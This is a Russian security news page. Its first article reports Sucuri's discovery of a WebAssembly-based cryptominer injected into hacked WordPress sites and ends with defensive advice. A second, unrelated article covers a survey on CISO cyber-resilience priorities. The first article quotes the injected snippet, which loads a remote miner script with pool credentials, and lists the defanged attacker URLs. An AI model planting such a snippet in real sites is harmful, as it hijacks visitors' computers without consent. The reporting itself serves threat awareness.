Криптоджекеры начали прятать свой код на сайтах с помощью WebAssembly

Криптоджекеры начали прятать свой код на сайтах с помощью WebAssembly

Криптоджекеры начали прятать свой код на сайтах с помощью WebAssembly

Эксперты Sucuri обнаружили необычный JavaScript-майнер, загружаемый на страницы при посещении взломанного сайта. Злоумышленники используют технологию WebAssembly, чтобы ускорить исполнение сценария и осложнить выявление вредоносных инъекций.

Бинарный формат WebAssembly (.wasm), позволяющий выполнять высокопроизводительные приложения на веб-страницах со скоростью, близкой к нативной, в настоящее время поддерживают более 95% установленных браузеров, в том числе Google Chrome, Microsoft Edge, Safari, Firefox и Opera. Код Wasm загружается и запускается из JavaScript и может работать в параллель в той же песочнице, обмениваясь данными с кодом JavaScript.

В Sucuri узнали о нововведении криптоджекеров, когда новый клиент запросил помощи— его компьютер начал сильно тормозить при подключении к персональному сайту WordPress. Беглый просмотр файлов на сайте выявил небольшой фрагмент кода, вставленный в один из файлов темы:

localStorage.setItem('f', 'auto.config({ login: "6110659", pass: "auto" }).power(10);');localStorage.setItem('s', 'hxxps://wm[.]bmwebm[.]org/auto.js');

Каждый раз, когда посетитель заходит на веб-страницу, этот сниппет загружает на стороне клиента скрипт auto.js из домена wm[.]bmwebm[.]org. Содержимое JavaScript-файла оказалось обфусцированным с помощью CharCode; декодирование показало, что это криптомайнер, стартующий при каждом визите на сайт.

Вшитые учетные данные, по всей видимости, используются для доступа к кастомному пулу в том же домене. Особый интерес у исследователей вызвала такая находка, как использование WebAssembly для запуска бинарного кода в среде браузера.

 

Расшифрованный auto.js также содержал инструкции для операций майнинга, которые исполняются в браузере вместе с JavaScript.

Позднее тот же самый криптомайнер был обнаружен на другом взломанном сайте, но уже под именем adservicegoogle.js. Он загружался из того же домена и пытался выдать себя за легитимный скрипт Google Ads.

Домен hxxps://wm[.]bmwebm[.]org/ был зарегистрирован в январе 2021 года, то есть полтора года криптоджекерам удавалось остаться незамеченными. В настоящее время (на 26 июля) их майнер работает на 195 сайтах, в том числе в TLD-зоне RU; по всей видимости, скромный масштаб киберкампании тоже помог злоумышленникам оставаться в тени.

Примечательно, что отдаваемые вредоносные JavaScript-файлы генерируются автоматически — злоумышленники просто меняют имя, добавляемое к домену:

  • hxxps://wm[.]bmwebm[.]org/wordpresscore.js
  • hxxps://wm[.]bmwebm[.]org/common.js
  • hxxps://wm[.]bmwebm[.]org/facebook-sdk.js
  • hxxps://wm[.]bmwebm[.]org/twitter.js
  • hxxps://wm[.]bmwebm[.]org/node.js

Реализованная функциональность также позволяет внедрять скрипты в разные места на зараженном сайте и поддерживать видимость легитимности инъекций.

Эксперты ожидают расширения использования WebAssembly киберкриминалом, несмотря на очевидное ограничение — зависимость от JavaScript. Код Wasm не способен самостоятельно собирать данные, подключаться к интернету и сливать награбленное на сторону. В составе веб-скимера, например, такой компонент может диктовать JavaScript, на каких веб-формах сосредоточиться, какой домен использовать для вывода данных и т. п. 

Использование Wasm, по словам Sucuri, способно затруднить выявление злонамеренных редиректоров, вредоносной рекламы, ложной техподдержки, скриптовых кейлоггеров, скрытых загрузок (drive-by) и других неблаговидных способов использования браузера. В тех случаях, когда браузер содержит уязвимость 0-day, оперирующий Wasm злоумышленник может причинить еще больше вреда — путем использования бинарного кода для эксплойта, и такую функциональность вряд ли обнаружит антивирусный сканер, заточенный под строковый анализ.

На сайтах подобные заражения тоже трудно выявить, если не с чем сравнить (нет бэкапа). Там, где Wasm уже используется в повседневных операциях, задача еще больше усложняется. Предотвратить инфицирование, по мнению экспертов, помогут следующие меры:

  • поддержка всего софта (CMS, плагинов, тем) в актуальном состоянии;
  • усиление защиты сайта и админ-панелей от брутфорса и словарных атак;
  • создание бэкапа и регулярное копирование контента и базы данных, с сохранением резервных копий вне сайта;
  • регулярные проверки целостности содержимого файлов на сайте;
  • использование средств фильтрации трафика прикладного уровня (WAF).
AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Киберустойчивость в приоритете: CISO в России меняют архитектуру ИБ

Специалисты «Инфосистем Джет» проанализировали ключевые изменения в работе руководителей по информационной безопасности (CISO) и выяснили, что компании всё чаще переосмысливают традиционные ИБ-подходы, смещая акцент в сторону киберустойчивости — способности не только противостоять атакам, но и быстро адаптироваться и восстанавливаться после инцидентов.

Исследование охватило более 70 организаций. Оно показало, что стратегическое пятилетнее планирование теряет популярность: если в 2023 году его придерживались 32% компаний, то в 2024 — лишь 15%.

Большинство перешло на краткосрочные горизонты: стратегии сроком до трёх лет используют 57% опрошенных, до двух лет — 25%. Ещё 4% ограничиваются планированием в пределах одного года. Такой подход объясняется необходимостью быстро адаптироваться к меняющейся обстановке и новым угрозам.

CISO концентрируются на устойчивости бизнес-процессов, быстром обнаружении атак и грамотном распределении ресурсов. Эти задачи требуют пересмотра ИБ-архитектуры и внедрения современных подходов. Особенно вырос интерес к тестированию планов восстановления после инцидентов (Disaster Recovery и Business Continuity) — спрос на такие услуги увеличился более чем на 30%. Чаще всего компании проверяют сценарий успешной атаки с применением вируса-шифровальщика.

Среди наиболее актуальных рисков участники исследования называют ИТ-сбои (58%) и кибератаки (17%). При этом для оценки угроз компании в основном используют качественные шкалы и смешанные методики. Лишь 8% организаций выражают риски в денежном эквиваленте — это характерно для финансового сектора, ретейла и крупных производств.

Практики сервисного подхода к ИБ — когда безопасность выстраивается как услуга, ориентированная на внутреннего заказчика — постепенно находят применение в российских компаниях. На сегодняшний день 11% организаций начали внедрять отдельные элементы этого подхода, ещё 14% уже предоставляют ИБ как внутреннюю услугу, оформив профильное подразделение в формате сервисного провайдера.

В 2024 году доля компаний, не имеющих в штате специалистов по ИБ, снизилась с 13% до 6%. При этом потребность в кадрах остаётся высокой: по сравнению с прошлым годом число вакансий в этой сфере выросло на 30%. В 61% компаний в течение года была открыта хотя бы одна позиция по ИБ. На фоне нехватки специалистов, 52% CISO готовы рассматривать студентов как потенциальных кандидатов.

«Киберустойчивость расширяет подход к безопасности, кратно повышая эффективность реагирования на современные атаки: шифровальщики, атаки на цепочки поставок, APT-атаки и другие. Недостаточно просто предотвращать атаки — важно уметь быстро восстанавливать работу после них», — говорит Александр Морковчин, руководитель группы аналитики и исследований департамента консалтинга, «Инфосистемы Джет».

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru